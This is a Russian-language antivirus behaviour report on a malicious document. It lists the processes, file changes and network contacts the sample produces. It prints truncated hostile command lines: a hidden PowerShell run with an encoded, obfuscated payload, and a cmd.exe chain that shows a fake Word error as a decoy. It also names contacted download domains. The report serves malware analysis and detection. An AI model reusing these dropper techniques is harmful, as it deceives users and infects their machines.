Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -ENCOD IAAgAFMARQBUACAAIABBAHUANgB3AEoAIAAoACAAIABbAHQAWQBwAGUAXQAoACIAewAxAH0AewAzAH0AewAwAH0AewAyAH0AIgAtAEYAJwBpAG8ALgBEAEkAUgBFAGMAVAAnACwAJwBzAFkAJwAsACcAbwByAFkA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1512
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\1170725.cvr
- %HOMEPATH%\rzidac2\bn6rmb_\nf3m8s.dll
Удаляет следующие файлы
- %HOMEPATH%\rzidac2\bn6rmb_\nf3m8s.dll
Подменяет следующие файлы
- %HOMEPATH%\rzidac2\bn6rmb_\nf3m8s.dll
Сетевая активность
Подключается к
- 'ta####cheap.co.za':80
- 'el####ndikat.com.mk':80
- 'ma####z1infa.5v.pl':80
- '5v.pl':443
TCP
Запросы HTTP GET
- http://el####ndikat.com.mk/cgi-sys/suspendedpage.cgi
UDP
- DNS ASK ta####cheap.co.za
- DNS ASK el####ndikat.com.mk
- DNS ASK ch########ge.mediadevstaging.com
- DNS ASK ma####z1infa.5v.pl
- DNS ASK 5v.pl
- DNS ASK pr######eparaloquevenga.com
- DNS ASK ja####harity.org
- DNS ASK po###gypt.com
Другое
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAgAFMARQBUACAAIABBAHUANgB3AEoAIAAoACAAIABbAHQAWQBwAGUAXQAoAC...
- '<SYSTEM32>\msg.exe' user /v Word experienced an error trying to open the file.
